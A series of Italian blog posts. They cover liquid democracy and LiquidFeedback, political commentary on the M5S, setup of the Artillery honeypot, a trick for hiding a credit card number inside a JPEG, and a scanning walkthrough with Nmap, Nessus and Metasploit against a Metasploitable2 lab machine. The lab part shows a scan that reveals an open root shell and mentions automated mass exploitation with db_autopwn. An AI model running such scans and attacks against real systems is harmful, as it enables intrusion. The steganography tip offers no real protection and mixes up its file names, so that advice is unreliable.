In pratica si può altrettanto legittimamente affermare che una forma politica simile, oltre ad essere scarsamente efficiente, non sia applicabile su vasta scala. Del resto quest’ultima è una opinione consolidata sin dai tempi della antica Grecia.

Una democrazia rappresentativa è fondata sul principio secondo cui degli eletti, per un tempo limitato e sulla base di un programma politico, rappresentino l’intera popolazione.
Anche questa forma di democrazia non è esente da problemi.
Nel caso in cui, ad esempio, l’elettore cambiasse nel frattempo idea, oppure ritenesse gli eletti non più idonei o coerenti con il programma iniziale, non potrebbe tuttavia fare molto. Anche nel caso in cui non approvasse completamente gli obiettivi di programma dovrebbe necessariamente accettare dei compromessi.

Fortunatamente, la tecnologia può fare molto per avvicinare le due concezioni, rendendole, da antitetiche, almeno complementari.

Non si tratta solamente di un problema tecnico.
Ridurre tutto a questo significherebbe tenere in considerazione solo l’aspetto dell’efficienza, tralasciando altri aspetti non meno importanti.
Rimarrebbero in piedi altri gravi problemi:

E’ legittimo aspettarsi che tutti siano in grado di trattare ogni questione? E’ legittimo aspettarsi che tutti si esprimano puntualmente su questioni importanti, o che siano in grado di farlo al riparo da pulsioni emotive (basta pensare all’eventuale reintroduzione della pena capitale, puntualmente evocata da alcuni a seguito di delitti particolarmente efferati)?

È qui che entra in gioco l’idea di base della democrazia liquida: un elettore può delegare il proprio voto a un fiduciario, tecnicamente un intermediario temporaneo.

Il voto può essere ulteriormente delegato da quest’ultimo ad un altro intermediario, e cosi via, in modo da produrre una catena di deleghe basate sulla fiducia. Tutte le deleghe possono essere create, modificate o revocate in base all’argomento in discussione.
Per esempio, Tizio potrebbe ritenersi in grado di esprimersi sulla questioni A, ma di non essere in grado di farlo sulla questione B, delegando a tal fine Caio, e facendosi invece rappresentare da Sempronio in tutte le altre aree, ma con la possibilità di revocare le proprie deleghe in qualsiasi momento.
Chiunque può scegliere il proprio livello di partecipazione, e le possibili applicazioni vanno dall’estremo della democrazia pura, all’estremo opposto della democrazia rappresentativa.

In sostanza, ciascuno partecipa alle decisioni a cui è interessato, ma per tutti gli altri argomenti dà la propria delega a qualcuno che agisca nel suo interesse.

Lo stato dell’arte, in termini di architettura software, è LiquidFeedback, il software utilizzato per primi dal Partito Pirata tedesco

LiquidFeedback è un software gratuito e opensorce progettato rilasciato col modello di licenza del MIT e sviluppato dal Public Software Group di Berlino, per la raccolta e la formalizzazione di opinioni condivise all’interno di una comunità, secondo i principi della democrazia liquida, integrando sia concetti di democrazia rappresentativa, che di democrazia diretta.

Il software si ripropone di dare una rappresentazione accurata delle opinioni espresse dai membri di una comunità, ed infatti ognuno è legittimato a promuovere le proprie iniziative, nei limiti imposti da regole in precedenza stabilite.
Il software è stato concepito per superare le limitazioni dei tradizionali forum di discussione internet, in particolare riguardo alla raccolta delle opinioni di gruppi di persone anche di notevoli dimensioni (come partiti politici), in modo sicuro e ordinato.

Attivamente sviluppato e migliorato nelle proprie funzionalità, l’ultima versione disponibile è molto recente (la 2.2.3 del 23 marzo per quanto riguarda la parte di backend).

Schematizzando, con Liquid Feedback è possibile:

1. raccogliere iniziative/proposte dei membri e presentarle in maniera ordinata alla comunità;
2. disporre di strumenti per la discussione e il dibattito sulle varie iniziative presentate;
3. promuovere la modifica delle proposte in modo che diventino più facilmente condivisibili;
4. promuovere e condividere proposte alternative;
5. gestire la votazione delle iniziative/proposte;
6. gestire lo storico di tutte le attività;
7. gestire un sistema di deleghe.

LiquidFeedback comprende un sistema deliberativo basato su iniziative o proposte che ricalca quello delle normali democrazie parlamentari; devono infatti seguire un iter per giungere alla fase finale della votazione. I fattori applicabili agli iter pure sono molto sofisticati, e riguardano, ad esempio, tempistiche o quorum.

Essendo stato sviluppato per promuovere iniziative/proposte condivise, ovviamente LiquidFeedback prevede la necessità, da parte dei loro promotori, di raccogliere il “sostegno” dei componenti della comunità perché le loro proposte possano procedere senza essere scartate;
Ogni proposta scartata per un qualsivoglia motivo, rimane comunque disponibile ed accessibile tramite un archivio storico.

Le iniziative sono organizzate all’interno di una grossa “bacheca” suddivisa in varie aree per permettere di ordinare le iniziative a seconda della loro tipologia/argomento e facilitarne la ricerca; la strutturazione è ad albero e pertanto simile ad una gerarchia di directory e sottodirectory. Ad un determinato livello sono definite le “aree” propriamente dette, ad esempio economia, scuola, sviluppo, ecc.
Le aree a loro volta sono suddivise in “sezioni”, dove le iniziative sono raccolte per argomento, o per aree più specifiche.
Vi possono essere poi aree comuni per tutti i membri, ed invece aree riservate a gruppi di lavoro.

Un’ altra caratteristica notevole di LiquidFeedback è che dispone di un sistema di voto delegato, basato sul principio, esaminato in precedenza, che sia legittimo, se previsto preventivamente, delegare qualcun altro (proxy) a rappresentarci nel valutare una proposta/iniziativa, qualora ritenuto una persona più competente ad esprimersi in merito a quella proposta.
Il sistema cerca in tal modo di incarnare anche il principio della democrazia rappresentativa.

Un altro aspetto peculiare è l’attenzione a principi di grande trasparenza interna: tutti i membri della comunità possono conoscere le attività degli altri membri. Ciò è possibile dato che tutte le votazioni avvengono con voto palese, (al termine di una votazione, oltre l’esito, è possibile visualizzare chi sono gli elettori e come ognuno ha votato), le deleghe sono pubbliche (in questo modo è possibile prevenire o tenere sotto osservazione concentrazioni di potere).

Dal profilo di ogni iscritto è possibile visualizzare tutte iniziative da lui create o a cui abbia partecipato.

Architettura

L’ implementazione di LiquidFeedback è suddivisibile in 2 parti:

• LiquidFeedback-Core (Backend)
• LiquidFeedback Frontend

Il core consiste in uno schema per il database PostgreSQL, inclusi gli algoritmi per le deleghe, il feedback e le procedure per le votazioni implementate come views SQL e procedure scritte in PL/pgSQL. Dal momento che il software ricade nei tarmini della (liberale) licenza MIT/X11-License è possibile l’inclusione in qualsiasi altro progetto software purché il linguaggio di programmazione scelto includa il supporto a PostgreSQL
L’unica dipendenza consiste in PostgreSQL versione 8.4 o superiore.

Il frontend è invece implementato in Lua utilizzando l’application framework WebMCP (pure esso by PSG). Anche il frontend è soggetto allo stesso tipo di licenza.
Le sue dipendenze consistono in:

• LiquidFeedback Core
• Lua 5.1
• WebMCP
• RocketWiki (pure esso by PSG) o qualsiasi altro programma in grado di convertire un plain-text in HTML
• Una utility per la conversione di immagini  (ad es. ImageMagick)

Frontend e backend, comprese le dipendenze (esclusi Lua e PostgreSQL) sono liberamente scaricabili dal sito PSG

Send post as PDF to

Quello che sta accadendo ora in Italia verrà probabilmente ricordato nei testi (o meglio files) di storia, come il vero inizio di una crisi epocale, la circostanza in cui è capitato che il primo tra i grandi paesi occidentali cadesse preda di un delirio tecnodemocratico, più tecno che demo, per la verità.

E’ successo che, confermando un talento consolidato, la coalizione di sx abbia saputo ancora una volta, se non proprio perdere, neppure vincere le elezioni, e di fatto non sia in grado di governare senza venire necessariamente a patti con qualcun altro, che nell’opinione del sottoscritto, che ha preferito votare SEL, non può essere nessun altro che non sia il M5S.

In questo senso mi spendo volentieri a supportare l’iniziativa di Fabio Roggiolani e Jacopo Fo, di invitare il M5S a mettere a punto una piattaforma comune di pochi ma sostanziali obiettivi da realizzare (in primis l’infame porcellum elettorale) prima di tornare, se inevitabile, a nuove elezioni.
Farsi lusingare dalle sirene della responsabilità ad ogni costo, dando vita alla riedizione di orribili mostri mitologici insieme a chi è pur sempre il primo responsabile del degrado di questo paese (avendo governato 15 degli ultimi 20 anni), vorrebbe invece dire la fine della sx e la sua balcanizzazione.

Detto questo, vorrei spendere qualche parola in una personale piccola analisi del fenomeno che ha maggiormente caratterizzato l’esito delle elezioni: lo straordinario successo del M5S di Beppe Grillo, ed i motivi di questo successo.

Credo che, dopo aver tratto in inganno gli avversari, facendo loro credere di aver ormai perso lo slancio iniziale, Beppe Grillo abbia saputo mettere in atto una irresistibile rimonta, che ha portato il M5S a risultare alla fine, a prescindere dalle coalizioni, il primo partito per numero di elettori.
E che l’efficacia di questo rush finale vada attribuita a più fattori: innanzitutto alla straordinaria professionalità di Grillo come attore comico, professionalità della quale la televisione si era colpevolmente (?) dimenticata da vent’anni almeno (e forse questo aiuta a spiegare, suonando come una vendetta finalmente consumata, l’accanimento antitelevisivo dello stesso Grillo).
In realtà il tanto avversato media televisivo quanto l’altrettanto odiato intero mondo giornalistico italiano hanno continuato masochisticamente a ad assicurargli grande visibilità, e paradossalmente, proprio per il gran rifiuto a comunicare con loro, mantenendolo così, a sbafo, al centro dell’attenzione, come un ingombrante convitato di pietra.

Ritornando all’aspetto professionale di Grillo come attore comico, non si può non notare che ha sempre recitato un particolare tipo di comicità, quella fustigatrice, una specie nella quale è possibile includere, per fare un esempio molto più soft, anche Luciana Litizzetto, e che è quella che, platelmante o in modo sottinteso, sfocia spesso alla fine in un vaffa… cui gli spettatori sono ben disposti ad unirsi, in una catarsi collettiva liberatoria.
Tale tipo di comicità è quella che meglio si adatta ad essere impiegata in politica, allo scopo di incitare le folle.
D’altro canto occorre dire che c’è anche chi è pronto ad affermare che in tal modo la violenza evocata viene appunto catartizzata e resa innoqua, pertanto al comico andrebbe in realtà conferito il Nobel per la pace, opinioni!

Da ultimo gli riconosco l’intuizione vincente di aver saputo presentarsi (unico in mezzo ad una schiera di dinosauri), come innovatore (seppur 65enne), che se ieri ci invitava tutti a usare skype, oggi cerca di attirarci con le lusinghe della democrazia diretta via Internet.
Grillo ha infatti saputo giocare la carta di Internet in modo magistrale, quasi pretendendo di essere, lui e il suo movimento, solo la naturale e inevitabile conseguenza dell’”era di Internet”.
La Rete, nella sua concezione, svolge la funzione di grande legittimatrice del suo dilettantismo e della sua attitudine profondamente anti-politica. Questa concezione ha ovviamente fatto presa, specialmente sui più giovani, ma è purtroppo una concezione immatura, viziata da quello che si può definire cyber-utopismo: la fiducia ingenua nel potenziale liberatorio della comunicazione online.
Questa “retorica digitale” è stata forse il principale ingrediente dello straordinario successo del Movimento 5 Stelle.
Mitizzando acriticamente la democrazia diretta virtuale e ostinandosi a negarne gli aspetti oscuri, i suoi ostinati sostenitori non vogliono riconoscere meccanismi piuttosto noti: All’interno di una massa aggregata è molto più appagante acclamare che sollevare obiezioni, oppure, peggio ancora, porsi in maniera critica. Si instaurano dinamiche perverse, in cui l’adesione ad un leader carismatico si sposa perfettamente con quel bisogno di riconoscimento che spesso, tra coloro che utilizzano piattaforme social, è il tratto distintivo principale. Il desiderio di venire accettati, e di evitare il rischio di venire emarginati per una qualche supposta diversità, porterebbe poi all’appiattimento di opinioni.
Il suo blog, il cui valore economico, in quanto unico tramite ufficiale tra il leader e i suoi sostenitori (ma a questo punto anche i suoi avversari), nel frattempo è ovviamente molto aumentato, rappresenta un esempio perfetto di come si sviluppino facilmente meccanismi simili.
Un blog di straordinario successo usato come unico campo di confronto non solo con gli altri, ma anche con la maggior parte dei propri sostenitori è un terreno di gioco in cui sarebbe da ingenui non sospettare che sia impiegato uno staff di “commentatori”, reali o virtuali, a pilotare il confronto online.

In ogni caso, quello cui non possiamo sottrarci, così come è inutile opporsi alla deriva dei continenti, o alla rotazione terrestre, è fare i conti col fatto che la politica virtuale ha fatto il suo prepotente ingresso in campo, piaccia o non piaccia, e la necessità che anche gli altri soggetti politici, e a me interessa riferirmi alla sinistra, sappiano adottare anch’essi strumenti (consultivi o partecipativi, non decisionali) basati sulla democrazia virtuale, sarà anzi una sfida da raccogliere, e insieme un contributo fondamentale per riaffermare il primato della politica rappresentativa, che rimane l’unica realmente possibile.

E necessario dunque capire che la Rete è uno strumento eccezionale, ma bisogna scoprirla e saperla usare sia per non esserne strumentalizzati che per fare in modo che si riveli realmente utile alla partecipazione politica.

Vorrei concludere consigliando la lettura di una intervista molto illuminante, e con riflessioni mirate proprio alla attuale situazione italiana, rilasciata da uno che nel digitale ci vive intensamente: il politologo bielorusso Evgeny Morozov, gia autore del best-seller “L’ingenuità della Rete”.

Send post as PDF to

L’ installazione ed il lancio di Artillery sono molto semplici: una volta effettuato il download via svn, occorre lanciare uno script installer, editare un file di configurazione (se lo si ritiene necessario) e poi mandarlo in esecuzione:

# cd /opt
# svn co http://svn.secmaniac.com/artillery artillery/
# ./setup.py
# cd /var/artillery
# vi config
# ./artillery.py

Durante il processo di installazione verranno poste alcune domande:

Do you want to install Artillery and have it automatically run when you restart [y/n]:
Do you want to keep Artillery updated? (requires internet) [y/n]:
Would you like to start Artillery now? [y/n]:

Artillery verrà installato come servizio sotto /etc/init.d/
E’ comunque consiglibile leggere e impostare il file di configurazione.
In ogni caso, una volta effettuate delle modifiche alla configurazione, si può impartire e renderle immediatamente operanti:

# python restart_server.py

Fate attenzione a non commettere l’ errore di editare invece i files risultanti dal download via svn. Una volta che che lo script di installazione sia stato eseguito, per modificarne la configurazione posizionatevi piuttosto nella directory /var/artillery.

Il contenuto del file config è piuttosto chiarificatore delle funzionalità del software:

# determina se attivare l'attività di monitoraggio dell'integrità di files sensibili
MONITOR=YES
#
# le directories da monitorare, se ne possono ancora aggiungere "/root","/var/", ecc.
MONITOR_FOLDERS="/var/www","/etc/"
#
# frequenza del controllo in secondi.
MONITOR_FREQUENCY=60
#
# esclusione dal controllo per certe directories o files, ad esempio: /etc/passwd,/etc/hosts.allow
EXCLUDE=
#

Il modo in cui Artillery implementa il controllo sulle modifiche alle directories desiderate ed ai files in esse contenuti consiste nel memorizzarne i valori hash (utilizzando SHA-512) in un database locale

# cat /var/artillery/database/integrity.database
...
/etc/services:96d6908fc914d8da8daae9072b8ebeec82e0f5d2dc5106b89f98ed34139a0390d81036acadb72981d6b97583ad6859c6d91dbba30e1b5d98fa28b88963e980bb
/etc/shadow:0407d6283ee9c66ea6b1ce2dcffd91147df0179619ec263708f7d9e2db32792546d908d1b75e62fda95bc7160af3f11ea9158b0920f2d423c02f34ade7557655
/etc/shadow-:0407d6283ee9c66ea6b1ce2dcffd91147df0179619ec263708f7d9e2db32792546d908d1b75e62fda95bc7160af3f11ea9158b0920f2d423c02f34ade7557655
/etc/shells:3b95731b9d9b998a27ec3087505614f2c78d40a9181b01a1e2eac7611cda026da895243007c7e8d4d02bccda6f64c95adaaa228aa806f502d5363bc1bccf7ca7
...

Se dovessero verificarsi dei cambiamenti nelle porzioni di filesystem monitorate, alcune signatures non corrisponderebbero e verrebbe emesso un alert.

# determina se attivare l'attività di HONEYPOT
HONEYPOT=YES
#
# ban automatico HONEYPOT
HONEYPOT_BAN=YES
#
# WHITELIST di indirizzi IP non vincolati dalle regole di controllo
WHITELIST_IP=127.0.0.1,localhost
#
# PORTS su cui attivare il monitoring
PORTS="135,445,22,1433,3389,8080,21,5900,25,53,110,1723,1337,10000,5800,44443"
#

Artillery ha un set di porte (comuni o comunemente attaccate) preimpostato sulle quali si pone in ascolto.
A rivelarle basta un semplice:

# netstat -antp |grep LISTEN
tcp 0 0 192.168.56.1:135 0.0.0.0:* LISTEN 22337/python
tcp 0 0 192.168.56.1:5800 0.0.0.0:* LISTEN 22337/python
tcp 0 0 192.168.56.1:5900 0.0.0.0:* LISTEN 22337/python
tcp 0 0 192.168.56.1:110 0.0.0.0:* LISTEN 22337/python
tcp 0 0 192.168.56.1:10000 0.0.0.0:* LISTEN 22337/python
tcp 0 0 192.168.56.1:8080 0.0.0.0:* LISTEN 22337/python
tcp 0 0 192.168.56.1:53 0.0.0.0:* LISTEN 22337/python
tcp 0 0 192.168.56.1:21 0.0.0.0:* LISTEN 22337/python
...


# determina se attivare l'alerting via email
EMAIL_ALERTS=OFF
#
# username SMTP
USERNAME="thisisjustatest@gmail.com"
#
# password SMTP
PASSWORD="pass"
#
# destinatario
SMTP_TO="testing@test.com"
#
# server per l'invio, per default gmail
SMTP_ADDRESS="smtp.gmail.com"
#
# Porta SMTP per l'invio. Di default è quella gmail con TTLS
SMTP_PORT="587"
#
# Indirizzo EMAIL su cui ricevere gli ALERTS
ALERT_USER_EMAIL="user@whatever.com"
#
# determina se l'invio delle email di alerting debba avvenire seguendo una certa frequenza. Se impostato a off, gli alerts
# verranno inviati automaticamente in tempo reale (può significare un mucchio di spam)
EMAIL_TIMER=ON
#
# la frequenza con la quale saranno inviati gli ALERTS per email (per default ogni 10 minuti)
EMAIL_FREQUENCY=600
#
# Attivazione del monitoraggio dei tentativi BRUTE FORCE contro SSH
SSH_BRUTE_MONITOR=ON
#
# Quanti tentativi prima del BAN
SSH_BRUTE_ATTEMPTS=4
#

L’esclusione dell’indirizzo IP che non riesca ad autenticarsi validamente viene effettuata attraverso il controllo del file /var/log/auth.log (per le distribuzioni basate su Debian)

# Per effettuare degli aggiornamenti automatici
AUTO_UPDATE=OFF
#
# ANTI DOS imposta la macchina a limitare le connessioni, e va impostato ad OFF nel caso non lo si intenda utilizzare
ANTI_DOS=ON
#
# Le porte dotate di protezione ANTI-DOS
ANTI_DOS_PORTS=80,443
#
# I parametri che limitano le connessioni come misura anti DOS
ANTI_DOS_THROTTLE_CONNECTIONS=50
ANTI_DOS_LIMIT_BURST=200
#

Tali parametri serviranno ad impostare una regola iptables per porta, come si evince da questa porzione di anti_dos.py

for ports in anti_dos_ports:
subprocess.Popen("iptables -A ARTILLERY -p tcp --dport %s -m limit --limit %s/minute --limit-burst %s -j ACCEPT" % (ports,anti_dos_throttle,anti_dos_burst), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()


# La path degli APACHE LOG FILES
ACCESS_LOG=/var/log/apache2/access.log
ERROR_LOG=/var/log/apache2/error.log
#
# Per specificare un indirizzo IP. Lasciato BLANK implica di considerare tutte le interfaccie.
#  "
BIND_INTERFACE="192.168.56.1"
#
# parametro che attiva il "THREAT INTELLIGENCE FEED", ed effettua la richiesta di https://www.trustedsec.com/banlist.txt allo scopo di ottenere una lista di websites malevoli ma già noti. Viene rinnovata ogni 24 ore.
THREAT_INTELLIGENCE_FEED=ON
#
# parametro che imposta quale debba essere il THREAT FEED di default. Attualmente utilizza TRUSTEDSEC
# Si possono specificare molteplici THREAT FEEDS separati da una virgola, tipo http://urlthreatfeed1,http://urlthreadfeed2
THREAT_FEED="https://www.trustedsec.com/banlist.txt"
#
# Un THREAT SERVER è un SERVER destinato a ospitare il file BANLIST.TXT in una locazione HTTP pubblica
#
# Questo parametro specifica se sia necessario essere un THREAT SERVER
THREAT_SERVER="OFF"
#
# Directory pubblica del THREAT SERVER, raggiungibile tramite HTTP. La funzione di THREAT SERVER deve essere ovviamente a ON
THREAT_LOCATION="/var/www/"

Cosa succede se tentiamo di connetterci alla porta 25 (una a caso tra quelle impostate come honeypot) con un host che non sia compreso nella whitelist? Si puo utilizzare telnet a tale scopo:

root@bt # telnet 192.168.56.1 25

una bella stringa spazzatura di lunghezza variabile tra i 5 e i 30000 caratteri

se tentassimo una seconda volta invece:

root@bt # telnet 192.168.56.1 25
Tryng 192.168.56.1
telnet: Unable to connect to remote host: Connection refused


la conseguenza del fatto che il primo tentativo ha provocato la creazione di una specifica regola di filtraggio:


# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ARTILLERY all -- anywhere anywhere

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain ARTILLERY (1 references)
target prot opt source destination
DROP all -- 192.168.56.101 anywhere
DROP all -- 173-216-236-248.mid.dyn.suddenlink.net anywhere
...


che va ad aggiungersi alle altre generate automaticamente a partire dal contenuto di banlist.txt

# cat /var/artillery/banlist.txt

#
#
# TrustedSec's Artillery Threat Intelligence Feed and Banlist Feed
# https://www.trustedsec.com
#
# Note that this is for public use only.
# The ATIF feed may not be used for commercial resale or in products that are charging fees for such services.
# Use of these feeds for commerical (having others pay for a service) use is strictly prohibited.
#
#
#
85.121.122.111
85.65.66.108
212.159.50.73
...
222.240.193.157
173.216.236.248
192.168.56.101


Send post as PDF to

Nel mondo reale esistono però delle situazioni comuni in cui è necessario conservare, oppure trasferire tramite tecnologie insicure, dati importanti, che anche se non interessano minimamente ad agenzie di intelligence, regimi dittatoriali o spie industriali, è necessario rimangano strettamente riservati, e talvolta ben nascosti.

In questa ottica, vediamo come, anche senza utilizzare alcun software particolare oltre alla comune shell di linux ed a tools molto comuni, sia possibile realizzare qualche forma di steganografia, certamente rudimentale, e tuttavia sufficiente per i nostri scopi.

Consideriamo ad esempio la necessità di recuperare velocemente, pur tenendolo al riparo da curiosi e malintenzionati, il codice numerico della carta di credito.

Potremmo:

memorizzare il codice della carta di credito in un file di testo:

# echo 4111-1111-1111-1111 >0

ottenerne una copia compressa, rimuovendo automaticamente l’originale

# gzip 0

accodarne il contenuto ad un qualsiasi file immagine

# cat 0.gz >>contenitore.jpg

Il motivo per cui ho voluto utilizzare un formato compresso ed un nome simile è che il formato compresso altera il contenuto dell’originale, chè è pur semplice testo, rendendolo inintelleggibile, mentre un nome descrittivo sarebbe comunque rimasto rilevabile come stringa ad una analisi superficiale

A questo punto, le dimensioni del file contenitore risulteranno aumentate, esattamente della lungezza del file accodato

Il file contenitore continua tranquillamente ad essere visualizzabile
essendo poi necessario memorizzare in qualche modo il numero di bytes accodati, per poterne poi estrarre il contenuto, un metodo comodo può essere quello di inserire questa informazione nello stesso nome del file contenitore, in modo da non doversene più preoccupare.

pertanto

# mv contenitore.jpg bassotti58.jpg

il suo contenuto è estraibile reindirizzando i bytes terminali del file, nella misura stabilita precedentemente (in questo caso, 58) in un ulteriore file

# tail -c 58 contenitore58.jpg >estratto.gz

ed ecco il nostro codice disponibile al bisogno

# gunzip estratto.gz

Non è certo una soluzione degna di Lisbeth Salander, ma è sempre (molto) meglio che mantenere un testo in chiaro o trascriverlo su una agenda.

Send post as PDF to

Esaminiamo un esempio pratico di integrazione, utilizzando le due macchine virtuali, BackTrackR3 (come attaccante) e Metasploible2 (come target).

Nmap e Nessus possiedono un differente tipo di filosofia riguardo allo scanning e comprendere come operano è importante.
Nessus, come Nmap, può essere usato per il network discovery, ma, a differenza di Nmap, è specificamente progettato per determinare le vulnerabilità dei sistemi che rileva.
Il server Nessus dispone di proprie tecniche di portscanning, service fingerprinting ed identificatione del sistema operativo. Tuttavia, potrebbe semplicemente verificarsi la situazione in cui Nmap sia già stato eseguiti prima, e disponendo già del suo output, si voglia sottoporre i risultati al vulnerability scan.

Abbiamo per prima cosa un completo scan ottenuto con Nmap

# nmap -O -sV -T4 -oX nmapscantext 192.168.56.102

Starting Nmap 6.00 ( http://nmap.org ) at 2012-08-29 14:15 CEST
Nmap scan report for 192.168.56.102
Host is up (0.0016s latency).
Not shown: 976 closed ports
PORT      STATE SERVICE              VERSION
21/tcp    open  ftp                  vsftpd 2.3.4
22/tcp    open  ssh                  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet               Linux telnetd
25/tcp    open  smtp                 Postfix smtpd
53/tcp    open  domain               ISC BIND 9.4.2
80/tcp    open  http                 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp   open  netbios-ssn          Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn          Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec                 netkit-rsh rexecd
513/tcp   open  login
514/tcp   open  shell?
1099/tcp  open  rmiregistry          GNU Classpath grmiregistry
1524/tcp  open  ingreslock?
2049/tcp  open  nfs (nfs V2-4)       2-4 (rpc #100003)
2121/tcp  open  ftp                  ProFTPD 1.3.1
3306/tcp  open  mysql                MySQL 5.0.51a-3ubuntu5
5432/tcp  open  postgresql           PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc                  VNC (protocol 3.3)
6000/tcp  open  X11                  (access denied)
6667/tcp  open  irc                  Unreal ircd
8009/tcp  open  ajp13                Apache Jserv (Protocol v1.3)
8180/tcp  open  http                 Apache Tomcat/Coyote JSP engine 1.1
56738/tcp open  mountd (mountd V1-3) 1-3 (rpc #100005)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port514-TCP:V=6.00%I=7%D=8/29%Time=503E07C9%P=i686-pc-linux-gnu%r(NULL,
SF:33,"\x01getnameinfo:\x20Temporary\x20failure\x20in\x20name\x20resolutio
SF:n\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1524-TCP:V=6.00%I=7%D=8/29%Time=503E07CF%P=i686-pc-linux-gnu%r(NULL
SF:,17,"root@metasploitable:/#\x20")%r(GenericLines,73,"root@metasploitabl
SF:e:/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20root@metasp
SF:loitable:/#\x20root@metasploitable:/#\x20")%r(GetRequest,428,"root@meta
SF:sploitable:/#\x20<HTML>\n<HEAD>\n<TITLE>Directory\x20/</TITLE>\n<BASE\x
SF:20HREF=\"file:/\">\n</HEAD>\n<BODY>\n<H1>Directory\x20listing\x20of\x20
SF:/</H1>\n<UL>\n<LI><A\x20HREF=\"\./\">\./</A>\n<LI><A\x20HREF=\"\.\./\">
SF:\.\./</A>\n<LI><A\x20HREF=\"bin/\">bin/</A>\n<LI><A\x20HREF=\"boot/\">b
SF:oot/</A>\n<LI><A\x20HREF=\"cdrom/\">cdrom/</A>\n<LI><A\x20HREF=\"dev/\"
SF:>dev/</A>\n<LI><A\x20HREF=\"etc/\">etc/</A>\n<LI><A\x20HREF=\"home/\">h
SF:ome/</A>\n<LI><A\x20HREF=\"initrd/\">initrd/</A>\n<LI><A\x20HREF=\"init
SF:rd\.img\">initrd\.img</A>\n<LI><A\x20HREF=\"lib/\">lib/</A>\n<LI><A\x20
SF:HREF=\"lost%2Bfound/\">lost\+found/</A>\n<LI><A\x20HREF=\"media/\">medi
SF:a/</A>\n<LI><A\x20HREF=\"mnt/\">mnt/</A>\n<LI><A\x20HREF=\"nohup\.out\"
SF:>nohup\.out</A>\n<LI><A\x20HREF=\"opt/\">opt/</A>\n<LI><A\x20HREF=\"pro
SF:c/\">proc/</A>\n<LI><A\x20HREF=\"root/\">root/</A>\n<LI><A\x20HREF=\"sb
SF:in/\">sbin/</A>\n<LI><A\x20HREF=\"srv/\">srv/</A>\n<LI><A\x20HREF=\"sys
SF:/\">sys/</A>\n<LI><A\x20HREF=\"tmp/\">tmp/</A>\n<LI><A\x20HREF=\"usr/\"
SF:>usr/</A>\n<LI><A\x20HREF=\"var/\">var/</A>\n<LI><A\x20HREF=\"vmlinuz\"
SF:>vmlinuz</A>\n<")%r(HTTPOptions,94,"root@metasploitable:/#\x20bash:\x20
SF:OPTIONS:\x20command\x20not\x20found\nroot@metasploitable:/#\x20root@met
SF:asploitable:/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20"
SF:)%r(RTSPRequest,94,"root@metasploitable:/#\x20bash:\x20OPTIONS:\x20comm
SF:and\x20not\x20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x
SF:20root@metasploitable:/#\x20root@metasploitable:/#\x20")%r(RPCCheck,17,
SF:"root@metasploitable:/#\x20")%r(DNSVersionBindReq,17,"root@metasploitab
SF:le:/#\x20")%r(DNSStatusRequest,17,"root@metasploitable:/#\x20")%r(Help,
SF:63,"root@metasploitable:/#\x20bash:\x20HELP:\x20command\x20not\x20found
SF:\nroot@metasploitable:/#\x20root@metasploitable:/#\x20")%r(SSLSessionRe
SF:q,51,"root@metasploitable:/#\x20bash:\x20{O\?G,\x03Sw=:\x20command\x20n
SF:ot\x20found\nroot@metasploitable:/#\x20");
MAC Address: 08:00:27:CC:12:C1 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN;
OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

OS and Service detection performed.
Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.61 seconds

Il comando Nmap precedente scaniona l’host target  (192.168.56.102), identificandone il sistema operativo  (-O), i servizi in esecuzione sulle porte rilevate aperte (-sV), e fornisce in output i propri risultati in XML (-oX) registrandoli nel file di nome “nmapscantext.xml”. utilizzando una scansione “aggressiva” in termini di velocità (-T4).

Ora possiamo utilizzare NessusClient per configurare una scansione Nessus che utilizzi i risultati forniti da Nmap.

Abilitiamo solamente il wrapper Nmap Importer NASL nella configurazione della policy di scansione:

Una volta completato il vulnerability scan, salviamo i risultati in formato nbe:

e quindi avviamo msfconsole. Ora, abbiamo bisogno di un database per archiviare i risultati.

Eseguiamo ora il comando “services”, che elencherà tutti i servizi rilevati in esecuzione sul sistema target.

Infine, paticolare più importante, il comando ‘vulns’ elencherà tutte le vulnerabilità riportate da Nessus e registrate nel file dei risultati.

In precedenza avremmo potuto eseguire ‘db_autopwn -x -e’ per selezionare i moduli exploit in base alla vulnerabilità e attaccare tutti i targets automaticamente, ma il modulo è attualmente deprecato.

Limitiamoci pertanto a sondare solamente la prima vulnerabilità:

Send post as PDF to

Tutto ciò, anziché riflessioni profonde dovrebbe suscitare sonore pernacchie.
Da che mondo è mondo tutte le innovazioni loro applicate hanno modificato i modelli di produzione nel senso della progressiva eliminazione della mano d’opera, ma bruciano posti di lavoro dove si subiscono passivamente, non dove si progettano, questo è il problema.
Inoltre una affermazione del genere dovrebbe risultare inaccettabile da chi, rappresentando un monopolista (prima di diritto, ora solo di fatto) delle TLC nazionali, avrebbe avuto il dovere quasi istituzionale di spingere nella direzione dell’innovazione e non l’ha mai fatto, quando non tirava indietro, come ai tempi della semiabortita ISDN.

Send post as PDF to

La attivazione di Nessus si lega strettamente al sistema sul quale viene installato, anche se nel nostro caso si tratta di una virtual machine.
Una volta installato Nessus su BackTrack 5, è necessario ottenere un Nessus activation code.

Nessus viene distribuito in due versioni (feeds): HomeFeed (gratuita), e ProfessionalFeed (a pagamento).
